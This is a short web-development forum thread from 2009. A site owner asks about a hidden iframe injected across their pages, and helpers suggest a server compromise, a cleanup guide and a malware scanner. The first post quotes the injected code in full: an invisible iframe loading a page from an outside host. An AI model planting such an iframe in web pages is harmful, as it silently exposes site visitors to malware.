Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 5 of 5
  1. #1
    New Coder
    Join Date
    Jul 2009
    Posts
    15
    Thanks
    4
    Thanked 0 Times in 0 Posts

    is this a hacker of sorts? (security issues)

    lately this has been embedding itself into a number of pages (cutting off original coding and therefore disrupting the page):
    <iframe src="http://xg8.in:8080/index.php" width=158 height=197 style="visibility: hidden"></iframe>

    i'm going to change the cpanel and ftp passwords but i have no clue what the heck this is. all my googling returns results in foreign languages, but i do spy the word "malware." any help is appreciated!

  • #2
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    It could also be that your server is compromised or you have some server side code that has some vulnerabilities. Do you have any code that allows user uploads?
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #3
    New Coder
    Join Date
    Jul 2009
    Posts
    15
    Thanks
    4
    Thanked 0 Times in 0 Posts
    nope, no such coding (i'm pretty sure). you can check out the site here:
    http://blank-label.com
    if the server's been compromised, do you think resetting passwords and such will solve it or is there any other action i can do to fix it?
    edit actually, now that i think about it, could someone be going through the contact form? it seems a little far fetched because the inserted code has been on various pages, mostly unrelated to the contact page, so i'm not sure how a person could manage to post the code in such varied locations.
    Last edited by alduhkneel; 07-27-2009 at 06:27 AM.

  • #4
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    From what I've been reading it seems that your system might be compromised.

    http://blog.unmaskparasites.com/2009...om-cn-domains/

    I know its not a .cn domain but the author says it applies to other domains too. Read the how to clean up part.

    The free version of Malwarebytes Anti-Malware should find the problem if there is one:
    http://www.malwarebytes.org/mbam.php
    Last edited by _Aerospace_Eng_; 07-28-2009 at 08:45 PM.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • Users who have thanked _Aerospace_Eng_ for this post:

    alduhkneel (07-28-2009)

  • #5
    New Coder
    Join Date
    Jul 2009
    Posts
    15
    Thanks
    4
    Thanked 0 Times in 0 Posts
    thanks for the help; hopefully this will solve it. :]


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •